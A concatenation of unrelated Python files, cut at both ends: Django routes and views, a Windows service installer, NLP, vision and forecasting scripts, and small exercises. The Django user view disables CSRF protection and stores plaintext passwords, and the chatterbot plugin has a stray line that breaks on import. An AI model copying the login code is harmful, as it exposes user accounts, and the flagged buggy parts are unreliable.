    img3 = cv2.rectangle(test2, top_left, bottom_right, (0, 0, 255), 3)
cv2.imwrite("zrj_test_final1.jpg", img2)
cv2.imwrite("zrj_test_final2.jpg", img3)
from django.conf.urls import url
from django.contrib import admin
from . import views
# URL routes for the parts app. Order matters: Django uses the first regex
# that matches, so the greedy catch-all patterns must stay last.
urlpatterns = [
    url(r'^$', views.home, name='home'),
    url(r'^admin/$', views.admin),
    url(r'^search/', views.search_parts, name='search'),
    url(r'^contact/$', views.contact, name='contact'),
    url(r'^new/$', views.new_type, name='new_type'),
    url(r'^parts/$', views.view_all, name='view_all'),
    # Two-segment edit/remove routes must precede the one-segment versions,
    # otherwise (.*) would swallow "<a>/<b>".
    url(r'^parts/(.*)/(.*)/edit/$', views.edit_type, name='edit_type'),
    url(r'^parts/(.*)/(.*)/remove/$', views.delete_type, name='delete_type'),
    url(r'^parts/(.*)/edit/$', views.edit_type, name='edit_type'),
    url(r'^parts/(.*)/remove/$', views.delete_type, name='delete_type'),
    url(r'^parts/(.*)/$', views.part_detail, name='part_detail'),
    # Fallback for anything else.
    url(r'^.*/$', views.no_match)
]
|
from django.db import models
from django.utils import timezone
from datetime import datetime
from searchapp.custom import path_and_rename
from django.dispatch import receiver
from django.db.models.signals import pre_delete, post_save
# Create Models here. Basic ones should be research paper(Paper), (Author), (User)
# Just included a basic template
# (Last edited Sat Nov 29 : dvd)
## Author model
## [TODO] add more attributes
class Author(models.Model):
    """Author of a publication."""
    name = models.CharField(('Name'), max_length=60)
    def __unicode__(self):
        # Python 2 string representation shown in the Django admin.
        return self.name
## Category of publication
##
class Category(models.Model):
    """Category a publication belongs to."""
    categoryName = models.CharField(('Name'), max_length=60)
    def __unicode__(self):
        return self.categoryName
## Sources of publication
class Source(models.Model):
    """Source (publisher/venue) of a publication."""
    sourceName = models.CharField(('Source'), max_length=60)
    def __unicode__(self):
        return self.sourceName
## Paper upload field
class PaperUpload(models.Model):
    """An uploaded paper file plus basic metadata."""
    # NOTE(review): upload_to receives the *result* of calling
    # path_and_rename() at class-definition time -- confirm it returns what
    # Django expects (vs. passing the callable itself).
    docfile = models.FileField(('Upload File'), upload_to=path_and_rename(), null=True, help_text="Browse a file")
    identify = models.CharField(('Title'), default='Uploaded Paper', max_length = 60)
    # Selectable publication years: 1920 .. current year (built at import).
    YEAR_CHOICES = []
    for r in range(1920, (datetime.now().year+1)):
        YEAR_CHOICES.append((r,r))
    # timeInsertion = models.DateTimeField(('Added on'), auto_now=True)
    # NOTE(review): default is evaluated once at import time; a long-running
    # process keeps using the year the server started in.
    publishedYear = models.IntegerField(('year'), choices=YEAR_CHOICES, default=datetime.now().year)
    source = models.ForeignKey(Source, max_length=60, blank=True)
    def __unicode__(self):
        return self.identify
##References
class Reference(models.Model):
    """Free-text reference entry cited by a paper."""
    description = models.CharField(('References'), max_length=1200)
    def __unicode__(self):
        return self.description
## Keywords associated with paper
class Keyword(models.Model):
    """Keyword associated with a paper."""
    keyword = models.CharField(('Keyword'), max_length=120)
    def __unicode__(self):
        return self.keyword
##
## Publication model [TODO] add more constraints
## Add upload field for admins
class Paper(models.Model):
    """A research paper with its metadata and relations."""
    title = models.CharField('Title of the paper', max_length=100)
    author = models.ManyToManyField(Author, blank=True)
    document = models.TextField(blank=True)
    source = models.TextField(blank=True, default='ACM Digital Library')
    abstract = models.TextField(blank=True)
    # NOTE(review): default is evaluated at import time, not per save.
    publishedYear = models.IntegerField(('year'), default=datetime.now().year)
    timeInsertion = models.DateTimeField(('Added on'), auto_now=True)
    category = models.ManyToManyField(Category, blank=True)
    paper_upload = models.ForeignKey(PaperUpload, blank=True, null=True)
    references = models.ManyToManyField(Reference, blank=True)
    keywords = models.ManyToManyField(Keyword, blank=True)
    def __unicode__(self):
        return self.title
|
import pathlib
import subprocess
import typer
from mirumon.cli.groups.core import DEFAULT_ATTEMPTS, DEFAULT_DELAY
from mirumon.cli.helpers import create_logs_dir, current_dir
# Paths/names shared by all nssm service commands below.
current_path = pathlib.Path().absolute()
NSSM_PATH = current_path / "thirdparty" / "nssm.exe"
SERVICE_NAME = "mirumon"
group = typer.Typer()
@group.command()
def start() -> None:
    # Start the installed mirumon Windows service via the bundled nssm.
    subprocess.call([NSSM_PATH, "start", SERVICE_NAME])
@group.command()
def install(
    server: str,
    device_token: str,
    reconnect_delay: int = DEFAULT_DELAY,
    reconnect_attempts: int = DEFAULT_ATTEMPTS,
    allow_shutdown: bool = False,
    debug: bool = False,
) -> None:
    """Install the mirumon client as a Windows service managed by nssm."""
    logs_dir = create_logs_dir()
    executable_path = current_dir() / f"{SERVICE_NAME}.exe"
    stdout_path = logs_dir / "stdout.log"
    stderr_path = logs_dir / "stderr.log"
    nssm_commands = nssm_service_setup_commands(
        # nssm config
        executable_path=executable_path,
        stdout_path=stdout_path,
        stderr_path=stderr_path,
        # client config
        server=server,
        device_token=device_token,
        reconnect_delay=reconnect_delay,
        reconnect_attempts=reconnect_attempts,
        allow_shutdown=allow_shutdown,
        debug=debug,
    )
    # Each nssm invocation configures one aspect of the service.
    for command in nssm_commands:
        subprocess.call(command)
@group.command()
def remove() -> None:
    # Uninstall the service; "confirm" suppresses nssm's interactive prompt.
    subprocess.call([NSSM_PATH, "remove", SERVICE_NAME, "confirm"])
@group.command()
def stop() -> None:
    # Stop the running mirumon service.
    subprocess.call([NSSM_PATH, "stop", SERVICE_NAME])
@group.command()
def restart() -> None:
    # Restart the mirumon service.
    subprocess.call([NSSM_PATH, "restart", SERVICE_NAME])
def nssm_service_setup_commands(
    *,
    executable_path: pathlib.Path,
    stdout_path: pathlib.Path,
    stderr_path: pathlib.Path,
    server: str,
    device_token: str,
    reconnect_delay: int,
    reconnect_attempts: int,
    allow_shutdown: bool,
    debug: bool,
) -> list:
    """Build the ordered list of nssm invocations that install and fully
    configure the mirumon Windows service."""
    shutdown_flag = "--allow-shutdown" if allow_shutdown else "--no-allow-shutdown"
    debug_flag = "--debug" if debug else "--no-debug"
    # Command-line arguments passed to the service executable.
    app_parameters = [
        NSSM_PATH,
        "set",
        SERVICE_NAME,
        "AppParameters",
        "run",
        str(server),
        str(device_token),
        "--reconnect-delay",
        str(reconnect_delay),
        "--reconnect-attempts",
        str(reconnect_attempts),
        shutdown_flag,
        debug_flag,
    ]
    commands = [
        [NSSM_PATH, "install", SERVICE_NAME, executable_path],
        [NSSM_PATH, "set", SERVICE_NAME, "Application", executable_path],
        app_parameters,
        [NSSM_PATH, "set", SERVICE_NAME, "AppStdout", stdout_path],
        [NSSM_PATH, "set", SERVICE_NAME, "AppStderr", stderr_path],
        [NSSM_PATH, "set", SERVICE_NAME, "AppExit", "Default", "Restart"],
        [NSSM_PATH, "set", SERVICE_NAME, "AppRestartDelay", "0"],
        [NSSM_PATH, "set", SERVICE_NAME, "DependOnService", "MpsSvc"],
        [NSSM_PATH, "set", SERVICE_NAME, "DependOnService", "winmgmt"],
    ]
    return commands
|
#!/usr/bin/env python3
import sys
def main(s):
    """Print and return 1 if the largest value in *s* is at least twice the
    second largest, otherwise -1.

    s -- sequence of strings parsable as integers (e.g. sys.argv[1:]);
         must contain at least two items.
    """
    nums = sorted(int(x) for x in s)
    verdict = 1 if nums[-1] >= 2 * nums[-2] else -1
    print(verdict)
    # Also return the verdict so callers/tests can use the result directly
    # (backward compatible: the original implicitly returned None).
    return verdict
if __name__ == '__main__':
    main(sys.argv[1:])
|
def counting_sheep(num):
    """Return the first multiple of *num* at which every decimal digit 0-9
    has appeared across the multiples seen so far, or 'INSOMNIA' when that
    never happens (only possible for num == 0).

    num -- number as a string or int.
    """
    if int(num) == 0:
        # 0, 0, 0, ... only ever shows the digit '0'.
        return 'INSOMNIA'
    base = set('0123456789')
    seen = set()
    multiplier = 0
    # BUG FIX: the original stopped after 100 multiples, an arbitrary cap;
    # for any nonzero num all ten digits eventually appear, so loop until
    # they do.
    while seen != base:
        multiplier += 1
        result = str(int(num) * multiplier)
        seen.update(result)
    return result
if __name__ == "__main__":
    # Read one case per line (the first line holds the case count) and
    # append "Case #i: <answer>" lines to output.txt.
    # BUG FIX: the original never closed 'test.in' and only closed the
    # output; `with` closes both even on error.
    with open('test.in') as fopen, open('output.txt', 'a') as output:
        line_num = 0
        for lines in fopen:
            if line_num == 0:
                # Skip the header line.
                line_num = line_num + 1
                continue
            num = lines.strip()
            output.write('Case #' + str(line_num) + ': ')
            output.write(counting_sheep(num) + '\n')
            line_num = line_num + 1
|
def get_int_in_range(low, high):
    """Keep prompting on stdin until the user enters an int in [low, high]."""
    val = int(input())
    while not (low <= val <= high):
        print("val is out of range try again")
        val = int(input())
    return val
def create_list(n, min, max):
    """Collect n user-entered integers, each constrained to [min, max]."""
    result = []
    for _ in range(n):
        print("enter integer in the range{}...{}:".format(min, max))
        result.append(get_int_in_range(min, max))
    return result
def main():
    # Demo driver: collect two integers in the range 10..20 and echo them.
    lst=create_list(2,10,20)
    print(lst)
# Runs on import, as in the original script (no __main__ guard).
main()
|
class _MessageError(BaseException):
    """Shared base for the application's error types.

    BUG FIX: the originals assigned self.message but never passed it to the
    exception constructor, so str(e) and tracebacks showed an empty message.
    The .message attribute is preserved for existing callers.

    NOTE(review): the hierarchy derives from BaseException, so a generic
    `except Exception` will NOT catch these -- confirm that is intentional.
    """
    message = ""
    def __init__(self):
        self.message = type(self).message
        super().__init__(self.message)
class DBConnectionError(_MessageError):
    message = "[ERROR] Connection failed. Try later"
class InvalidSignInParamError(_MessageError):
    message = "[ERROR] Wrong mail or password. check it again"
class InvalidPasswordError(_MessageError):
    message = "[ERROR] Password must be longer than 6 words"
class NoSuchUserError(_MessageError):
    message = "[ERROR] No such user"
class AlreadySignedUpError(_MessageError):
    message = "[ERROR] Already Signed up"
class InvalidMailError(_MessageError):
    message = "[ERROR] Invalid mail format"
class InvalidUsernameError(_MessageError):
    message = "[ERROR] Username must be 6~12 characters"
class NoPostError(_MessageError):
    message = "[INFO] There is no post on your wall or feed"
class LogOutException(BaseException):
    """Control-flow signal raised to end the current session (no message)."""
    def __init__(self):
        pass
class AlreadyExistUsernameError(_MessageError):
    message = "[ERROR] Username already exists"
class AccessDenyError(_MessageError):
    message = "[ERROR] You're not allowed to delete this post"
class NoFollowerError(_MessageError):
    message = "[INFO] There is no following. Add new friends :)"
|
# -*- coding: utf-8-*-
import datetime
import re
from client.app_utils import getTimezone
from semantic.dates import DateService
from chatterbot import ChatBot
# Keywords that trigger this module (consumed by the plugin dispatcher).
WORDS = ["CHAT"]
def handle(text, mic, profile):
    """
    Runs an interactive chatterbot session until the user says "exit".
    (The original docstring was copied from the time module and was wrong.)

    Arguments:
    text -- user-input, typically transcribed speech
    mic -- used to interact with the user (for both input and output)
    profile -- contains information related to the user (e.g., phone
               number)
    """
    mic.say("Chatterbot is starting now")
    handleForever(mic, profile)
    mic.say("Chatterbot is stopping now")
mic.say("Chatterbot is stopping now")
def handleForever(mic, profile):
    """
    Chat loop: listen, forward each utterance to the chatbot, speak the
    reply. Returns when the user says "exit".

    Arguments:
    mic -- used to interact with the user (for both input and output)
    profile -- user profile (unused here, kept for the plugin interface)
    """
    chatbot = ChatBot()
    while True:
        # Renamed from `input`, which shadowed the builtin; also removed the
        # unused `exitfromhere` local.
        utterance = mic.activeListen()
        if utterance == "exit":
            return
        mic.say(chatbot.get_response(utterance))
def isValid(text):
    """
    Returns True if the input asks for chat mode.

    Arguments:
    text -- user-input, typically transcribed speech
    """
    # BUG FIX: the original pattern r'\chat\b' contains the invalid escape
    # \c, which raises re.error on Python >= 3.7; the intended pattern is
    # the word "chat" bounded by \b on both sides.
    return bool(re.search(r'\bchat\b', text, re.IGNORECASE))
|
#! /usr/bin/python
__author__="Yue Luo <yl4003@columbia.edu>"
__date__ ="$Feb 16, 2019"
import sys
from collections import defaultdict
import math
from count_freqs import sentence_iterator,simple_conll_corpus_iterator
import numpy as np
import time
"""
Implement the Modified Viterbi Algorithm and runs it on the ner_dev.data.
We import the iterator method from the "count_freqs.py" file.
"""
class counter(object):
    """
    Stores all the counts (word/tag, unigram, bigram, trigram) needed to
    compute the emission (e) and transition (q) log-probabilities used by
    the Viterbi algorithm.

    BUG FIX: several methods referenced the module-level globals
    `count_file` and `counter` instead of `self`; they only worked by
    accident because the __main__ block happened to bind those names.
    All accesses now go through self.
    """
    def __init__(self, count_file, all_tags):
        self.count_file = count_file            # open handle to the counts file
        self.Count_y_x = defaultdict(int)       # Count(tag -> word)
        self.Count_y = defaultdict(int)         # Count(tag)
        self.Count_trigram = defaultdict(int)   # Count(t_{i-2}, t_{i-1}, t_i)
        self.Count_bigram = defaultdict(int)    # Count(t_{i-1}, t_i)
        self.all_tags = all_tags                # list of valid tags
        self.trigram = defaultdict(int)         # optional precomputed log q values
        self.frequency_word = defaultdict(int)  # total occurrences per word
    def get_counts(self):
        """
        Get the counts that will be used to compute the q and e's used in
        the Viterbi algorithm.
        q = Count_trigram/Count_bigram
        e = Count_y_x / Count_y
        """
        l = self.count_file.readline()
        while l:
            line = l.strip()
            fields = line.split(" ")
            if fields[1] == "WORDTAG":
                self.Count_y_x[(fields[2],fields[3])] = int(fields[0])
                self.frequency_word[fields[3]] += int(fields[0])
            elif fields[1] =="1-GRAM":
                self.Count_y[fields[2]] = int(fields[0])
            elif fields[1] == "2-GRAM":
                self.Count_bigram[(fields[2],fields[3])] = int(fields[0])
            elif fields[1] =="3-GRAM":
                self.Count_trigram[(fields[2],fields[3],fields[4])] = int(fields[0])
            l = self.count_file.readline()
    def get_log_e_x_v(self, word, tag):
        """
        Get the log_e(x|v) value given x=word and v=tag.
        Value is log(Count(v->x) / Count(v)).
        Words never seen in training are mapped to _RARE_ first.
        """
        assert tag in self.all_tags # Ensure that this is a valid tag.
        if word not in self.frequency_word:
            word = "_RARE_"
        if self.Count_y_x[(tag,word)] == 0: # This word, tag combination has never appeared.
            return -9999999999.0            # effectively log(0)
        log_pr = math.log(self.Count_y_x[(tag,word)]) - math.log(self.Count_y[tag]) # same as log(a/b)
        assert log_pr <= 0
        return log_pr
    def get_log_q_v_w_u(self, tags):
        """
        Get the log_q(v|w,u) value given w = t_{i-2}, u = t_{i-1}, v = t_i.
        Tags are in order (w, u, v). Value is log(Count(w,u,v) / Count(w,u)).
        """
        if (tags[0],tags[1],tags[2]) in self.Count_trigram:
            count_3 = self.Count_trigram[(tags[0],tags[1],tags[2])]
        else: # Trigram not found in training set
            return -9999999999.0
        if (tags[0],tags[1]) in self.Count_bigram:
            count_2 = self.Count_bigram[(tags[0],tags[1])]
        else: # Bigram not found in training set
            return -9999999999.0
        log_pr = math.log(count_3) - math.log(count_2)
        assert log_pr <= 0
        return log_pr
    def get_trigrams(self, trigram_name):
        """
        Load precomputed log q values from 5_1.txt (not used in this work).
        """
        try:
            # Py3 fix: the builtin file() no longer exists; use open().
            trigram_file = open(trigram_name, "r")
        except IOError:
            sys.stderr.write("ERROR: Cannot read trigramfile %s.\n" % trigram_name)
            sys.exit(1)
        with trigram_file:
            l = trigram_file.readline()
            while l:
                line = l.strip()
                fields = line.split(" ")
                self.trigram[(fields[0],fields[1],fields[2])] = float(fields[3])
                l = trigram_file.readline()
    def get_log_q_v_w_u_byfile(self, tags):
        """
        Look up a precomputed log q value (not used in this work).
        """
        if (tags[0],tags[1],tags[2]) in self.trigram:
            return self.trigram[(tags[0],tags[1],tags[2])]
        else:
            return -9999999999.0
def viterbi(sentence, counter):
    """
    Calculate the tags of a sentence based on the counts from training data,
    using the trigram Viterbi algorithm with log probabilities.
    Output a list of tags with the same size as sentence, and the log prob.
    """
    n = len(sentence)
    assert n > 0 # Should be a valid sentence.
    n_tags = len(counter.all_tags)
    tags = []
    log_pr = []
    # dp[i,j,k]: best log-prob of any tag sequence ending with (tag_j, tag_k)
    # at position i; bp[i,j,k] is the argmax tag two positions back.
    dp = np.zeros((n,n_tags,n_tags))
    bp = np.zeros((n,n_tags,n_tags))
    # Forward Process to get the table
    for i in range(n):
        if i == 0: # This case only with (*,*,_) trigram.
            for j in range(n_tags): # iter all v. w and u are fixed as *. No need for bp[].
                v = counter.all_tags[j]
                w_u_v = ["*","*",v]
                sum = counter.get_log_q_v_w_u(w_u_v) + counter.get_log_e_x_v(sentence[i],v)
                dp[0,0,j] = sum
        elif i == 1: # This case only with (*,_,_) trigram.
            for j in range(n_tags):
                for k in range(n_tags):
                    u = counter.all_tags[j]
                    v = counter.all_tags[k]
                    w_u_v = ["*",u,v] # w is always fixed as *. No need for bp[].
                    sum = dp[0,0,j] + counter.get_log_q_v_w_u(w_u_v) + counter.get_log_e_x_v(sentence[i],v)
                    dp[i,j,k] = sum
        else:
            for j in range(n_tags):
                for k in range(n_tags):
                    u = counter.all_tags[j]
                    v = counter.all_tags[k]
                    w = counter.all_tags[0]
                    w_u_v = [w,u,v]
                    # Initialize the max with w = first tag to avoid a fake
                    # -inf baseline.
                    sum = dp[i-1,0,j] + counter.get_log_q_v_w_u(w_u_v) + counter.get_log_e_x_v(sentence[i],v)
                    max_log_pr = sum # Set to the first one. Otherwise is a bug here.
                    max_tag = 0
                    emission = counter.get_log_e_x_v(sentence[i],v) # Reduce time.
                    for l in range(n_tags):
                        w = counter.all_tags[l]
                        w_u_v = [w,u,v] # this should be a triple set now.
                        sum = dp[i-1,l,j] + counter.get_log_q_v_w_u(w_u_v) + emission
                        if sum > max_log_pr:
                            max_log_pr = sum
                            max_tag = l
                    dp[i,j,k] = max_log_pr
                    bp[i,j,k] = max_tag
    # Backward process to retrieve the tags.
    if n == 1: # Only one word in sequence.
        max_tag = 0
        max_log_pr = -9999999999.0
        for j in range(n_tags):
            v = counter.all_tags[j]
            w_u_v = ["*",v,"STOP"]
            sum = dp[0,0,j] + counter.get_log_q_v_w_u(w_u_v)
            if sum > max_log_pr:
                max_log_pr = sum
                max_tag = j
        # NOTE(review): this uses the loop variable j (its final value), not
        # max_tag -- looks like a bug; confirm against expected output.
        tags = [counter.all_tags[j]]
        log_pr = [max_log_pr]
    else: # Get the last two tags first.
        max_tag_u = 0
        max_tag_v = 0
        max_log_pr = -9999999999.0
        for j in range(n_tags):
            for k in range(n_tags):
                u = counter.all_tags[j]
                v = counter.all_tags[k]
                w_u_v = [u,v,"STOP"]
                sum = dp[n-1,j,k] + counter.get_log_q_v_w_u(w_u_v)
                if sum > max_log_pr:
                    max_log_pr = sum
                    max_tag_u = j
                    max_tag_v = k
        tags.append(counter.all_tags[max_tag_v])
        tags.append(counter.all_tags[max_tag_u])
        log_pr.append(dp[n-1,max_tag_u,max_tag_v])
        # Iterate back and find previous tags.
        # NOTE(review): max_tag_u is recomputed from bp indexed with the
        # *already updated* max_tag_v, and log_pr then uses the updated
        # pair -- verify this backtracking order against the dp definition.
        for i in range(n-3,-1,-1):
            tags.append(counter.all_tags[int(bp[i+2,max_tag_u,max_tag_v])])
            max_tag_v = max_tag_u
            max_tag_u = int(bp[i+2,max_tag_u,max_tag_v])
            log_pr.append(dp[i+1,max_tag_u,max_tag_v])
        log_pr.append(dp[0,0,max_tag_u])
    # Need to reverse the two lists since we store in reversed order.
    tags.reverse()
    log_pr.reverse()
    assert len(tags) == n and len(log_pr) == n
    return tags, log_pr
def write_output(counter, input_file, output_name):
    """
    Based on the counts and the input file, calculate the most likely tag
    using the Viterbi algorithm, and write the word, the predicted tag and
    log likelihood to output_file.
    Dev.dat should have 3247 sentences.
    NOTE: this module is Python 2 (file() builtin, print statement).
    """
    output_file = file(output_name, "w")
    input_file.seek(0)
    start_time = time.time()
    sentence_iter = sentence_iterator(simple_conll_corpus_iterator(input_file))
    count = 0
    for sentence in sentence_iter: # run viterbi for each sentence.
        count += 1
        s = [x[1] for x in sentence]
        tags, log_pr = viterbi(s, counter)
        for i in range(len(s)):
            l = s[i] + " " + tags[i] + " " + str(log_pr[i]) + "\n"
            output_file.write(l)
        # Blank line separates sentences in the CoNLL-style output.
        output_file.write("\n")
    output_file.close()
    print "Total time: %.4fs...%i sentences" % ((time.time()-start_time),count)
def usage():
    # Print CLI help (Python 2 print-statement syntax).
    print """
    python 5_2.py
        Read a count_file which already counted all low freq word as _RARE_. And
        a input_file with words you want to label with HMM model and Viterbi Algo.
        No arguments should be taken.
    """
if __name__ == "__main__":
    # Any CLI argument just prints usage and exits.
    if len(sys.argv)>=2:
        usage()
        sys.exit(2)
    count_name = "./ner_rare.counts"
    input_name = "./ner_dev.dat"
    # trigram_name = "./5_1.txt" # Not use it in this work.
    try:
        count_file = file(count_name,"r")
    except IOError:
        sys.stderr.write("ERROR: Cannot read countfile %s.\n" % count_name)
        sys.exit(1)
    try:
        input_file = file(input_name,"r")
    except IOError:
        sys.stderr.write("ERROR: Cannot read inputfile %s.\n" % input_name)
        sys.exit(1)
    all_tags = ["I-PER","I-ORG","B-ORG","I-LOC","B-LOC","I-MISC","B-MISC","O"]
    # Get the counts
    # NOTE(review): this rebinds the name `counter` from the class to an
    # instance; it works only because the class is not needed afterwards.
    counter = counter(count_file, all_tags)
    counter.get_counts()
    # Run estimator on Dev file and output it.
    output_name = "5_2.txt"
    write_output(counter, input_file, output_name)
    # After that, should use "python eval_ne_tagger.py ner_dev.key 5_2.txt" to check.
|
#-*- coding:utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
from PIL import Image, ImageDraw
import torch.utils.data as data
import numpy as np
import random
from utils.augmentations import process_rotation_multiscale
def tensor_rot_90(x):
    # Rotate a CHW tensor 90 degrees: mirror the width axis, then swap H/W.
    return torch.transpose(x.flip(2), 1, 2)
def tensor_rot_180(x):
    # Rotate a CHW tensor 180 degrees: mirror both spatial axes in one call.
    return torch.flip(x, (1, 2))
def tensor_rot_270(x):
    # Rotate a CHW tensor 270 degrees: swap H/W, then mirror the width axis.
    return torch.flip(x.transpose(1, 2), (2,))
class WIDERDetectionRotation(data.Dataset):
    """Dataset yielding fixed-size face crops with a random 0/90/180/270
    degree rotation applied; the rotation index (0-3) is the label.
    """
    def __init__(self, list_file):
        # list_file format per line: <path> <num_faces> then 5 numbers per
        # face: x y w h c. Degenerate boxes (w<=0 or h<=0) are dropped, and
        # images with no remaining boxes are skipped entirely.
        super(WIDERDetectionRotation, self).__init__()
        self.fnames = []
        self.boxes = []
        self.labels = []
        with open(list_file) as f:
            lines = f.readlines()
            for line in lines:
                line = line.strip().split()
                num_faces = int(line[1])
                box = []
                label = []
                for i in range(num_faces):
                    x = float(line[2 + 5 * i])
                    y = float(line[3 + 5 * i])
                    w = float(line[4 + 5 * i])
                    h = float(line[5 + 5 * i])
                    c = int(line[6 + 5 * i])
                    if w <= 0 or h <= 0:
                        continue
                    box.append([x, y, x + w, y + h])
                    label.append(c)
                if len(box) > 0:
                    self.fnames.append(line[0])
                    self.boxes.append(box)
                    self.labels.append(label)
        self.num_samples = len(self.boxes)
        self.size = 256  # side length of the square crop
    def __len__(self):
        return self.num_samples
    def __getitem__(self, index):
        # Retry loop: on any failure (missing file, crop error) fall back
        # to a random other sample instead of raising, so training runs on.
        while True:
            try:
                image_path = self.fnames[index]
                img = Image.open(image_path)
                if img.mode == 'L':
                    img = img.convert('RGB')
                im_width, im_height = img.size
                # select a face
                target_face = random.choice(self.boxes[index])
                # Center the crop on the face with +/-16 px jitter, clamped
                # so the crop stays fully inside the image.
                left_x = (target_face[0]+target_face[2]) // 2 - self.size // 2 + random.randint(-16,16)
                left_y = (target_face[1]+target_face[3]) // 2 - self.size // 2 + random.randint(-16,16)
                left_x = np.clip(left_x, 0, im_width-self.size)
                left_y = np.clip(left_y, 0, im_height-self.size)
                img = img.crop([left_x, left_y, left_x+self.size, left_y+self.size])
                # Random rotation class: 0 -> 0deg, 1 -> 90, 2 -> 180, 3 -> 270
                # (PIL's rotate is counter-clockwise).
                label = np.random.randint(4)
                if label == 1:
                    img = img.rotate(90)
                elif label == 2:
                    img = img.rotate(180)
                elif label == 3:
                    img = img.rotate(270)
                img = process_rotation_multiscale(img)
                break
            except Exception as e:
                print('Error in WIDERDetectionRotation:', image_path, e)
                index = random.randrange(0, self.num_samples)
        return torch.from_numpy(img), torch.from_numpy(np.ones([1])*label).long()
    def annotransform(self, boxes, im_width, im_height):
        # Normalize absolute pixel boxes to [0, 1] relative coordinates.
        boxes[:, 0] /= im_width
        boxes[:, 1] /= im_height
        boxes[:, 2] /= im_width
        boxes[:, 3] /= im_height
        return boxes
import fbprophet
# print version number
print('Prophet %s' % fbprophet.__version__)
import pandas as pd
import numpy as np
from pandas import read_csv, to_datetime
# load data
train_path = '/opt/ml/processing/input/energy-train.csv'
df = read_csv(train_path, header=0)[["Date", "Load"]]
# summarize shape
print(df.shape)
# show first few rows
# prepare expected column names (Prophet requires ds/y)
df.columns = ['ds', 'y']
df['ds'] = to_datetime(df['ds'])
print(df)
# define the model
model = fbprophet.Prophet()
# fit the model
model.fit(df)
# define the period for which we want a prediction
# (every 5 minutes of the 23:00 hour on 2020-12-25)
future = list()
for i in range(0, 55, 5):
    date = f'2020-12-25 23:{i}:00'
    future.append([date])
future = pd.DataFrame(future)
future.columns = ['ds']
future['ds'] = to_datetime(future['ds'])
# use the model to make a forecast
forecast = model.predict(future)
# NOTE(review): this aligns df['y'] to the forecast rows by positional
# index (0..10), i.e. the FIRST rows of the training set -- confirm those
# rows actually correspond to the forecast timestamps.
forecast['actual'] = df['y']
# summarize the forecast
print(forecast[['ds', 'yhat', 'yhat_lower', 'yhat_upper', 'actual']])
print(f"loss={np.sum((forecast['yhat'] - forecast['actual'])**2)}")
# plot forecast
import pickle
pkl_path = "/opt/ml/processing/output/model/Prophet.pkl"
with open(pkl_path, "wb") as f:
    # Pickle the 'Prophet' model using the highest protocol available.
    pickle.dump(model, f)
# save the dataframe
forecast.to_pickle("/opt/ml/processing/output/forecast/forecast.pkl")
print("*** Data Saved ***")
|
import win32com
import win32com.client
def makePPT(path):
    """Create a two-slide PowerPoint presentation via COM and save it to
    *path*. Requires PowerPoint installed (pywin32 automation).
    """
    # BUG FIX: the ProgID was misspelled "PowerPoint.Appplication", which
    # makes Dispatch fail with "Invalid class string".
    ppt = win32com.client.Dispatch("PowerPoint.Application")
    ppt.Visible = True
    # Add a new presentation file.
    pptFile = ppt.Presentations.Add()
    # Create the first slide (position 1, layout 1) and fill its two
    # placeholder text frames.
    page1 = pptFile.Slides.Add(1,1)
    t1 = page1.Shapes[0].TextFrame.TextRange
    t1.Text = "tracy"
    t2 = page1.Shapes[1].TextFrame.TextRange
    t2.Text = "tracy is a good man"
    # Create the second slide.
    # BUG FIX: the original added the second slide at position 1 again and
    # then wrote its text into page1, leaving the new slide empty.
    page2 = pptFile.Slides.Add(2,1)
    t1 = page2.Shapes[0].TextFrame.TextRange
    t1.Text = "tracy1"
    t2 = page2.Shapes[1].TextFrame.TextRange
    t2.Text = "tracy1 is a good man"
    # Save and clean up.
    pptFile.SaveAs(path)
    pptFile.Close()
    ppt.Quit()
# Destination for the generated presentation (raw string for backslashes).
path = r"G:\python_learn\pycharm_learn\pythonlearn\day011\6ๅppt\a.pptx"
makePPT(path)
from django.db import models
from django.db.models.base import Model
from django.db.models.fields import EmailField
from django.http.response import JsonResponse
from django.utils.decorators import method_decorator
from django.shortcuts import render
from django.views import View
from django.views.decorators.csrf import csrf_exempt
from .models import User
import json
# Create your views here.
class UserView(View):
    """JSON CRUD endpoint for User records.

    NOTE(review): CSRF protection is disabled for every verb, and passwords
    are compared/stored in plain text -- both should be revisited.
    """
    @method_decorator(csrf_exempt)
    def dispatch(self, request, *args, **kwargs):
        # Apply csrf_exempt to all HTTP methods handled by this view.
        return super().dispatch(request, *args, **kwargs)
    def get(self, request,id=0):
        # id > 0: fetch a single user; otherwise list all users.
        if(id > 0):
            users = list(User.objects.filter(id=id).values())
            if len(users) > 0:
                user = users[0]
                datos = {'message': "Success", 'users': user}
            else:
                datos = {'message': "User not found..."}
            return JsonResponse(datos)
        else:
            users = list(User.objects.values())
            if len(users) > 0:
                datos = {'message': "Success", 'users': users}
            else:
                datos = {'message': "User not found..."}
            return JsonResponse(datos)
    def post(self, request):
        # Dispatch on the 'action' field: login or registration.
        print(request.body)
        print(request)
        jd = json.loads(request.body)
        if jd['action']=='login_progress':
            # NOTE(review): plain-text password comparison in the DB query.
            users = list(User.objects.filter(email=jd['email']))
            passwords = list(User.objects.filter(password=jd['password'],email=jd['email']))
            if users and passwords:
                datos={'message':"success"}
            else:
                datos = {'message': "User not found..."}
            print(datos)
            return JsonResponse(datos)
        # print(jd)
        elif jd['action']=='registration_progress':
            users = list(User.objects.filter(email=jd['email']))
            if users:
                datos = {'message': "user already registered"}
            else:
                User.objects.create(
                    email=jd['email'], password=jd['password'])
                datos={'message':"success"}
            print(datos)
            return JsonResponse(datos)
    def put(self, request, id):
        # Update a user's email; rejected when the target user does not
        # exist or the new email is already taken.
        jd = json.loads(request.body)
        users = list(User.objects.filter(id=id).values())
        user = list(User.objects.filter(email=jd['email']))
        if len(users) > 0 and len(user) == 0:
            user = User.objects.get(id=id)
            user.email = jd['email']
            user.save()
            datos = {'message': "Success"}
        else:
            # NOTE(review): sending the user's *current* email also lands
            # here ("User not found...") -- confirm intended.
            datos = {'message': "User not found..."}
        print(datos);
        return JsonResponse(datos)
    def delete(self, request, id):
        # Delete a user by id.
        users = list(User.objects.filter(id=id).values())
        if len(users) > 0:
            User.objects.filter(id=id).delete()
            datos = {'message': "Success"}
        else:
            datos = {'message': "User not found..."}
        return JsonResponse(datos)
|
from flask.cli import AppGroup
from .users import seed_users, undo_users
from .stories import seed_stories, undo_stories
from .micro_stories import seed_micro_stories
from .formats import seed_formats, undo_formats
from app.models import db
# Creates a seed group to hold our commands
# So we can type `flask seed --help`
seed_commands = AppGroup('seed')
# Creates the `flask seed all` command
@seed_commands.command('all')
def seed():
    """Seed every table.

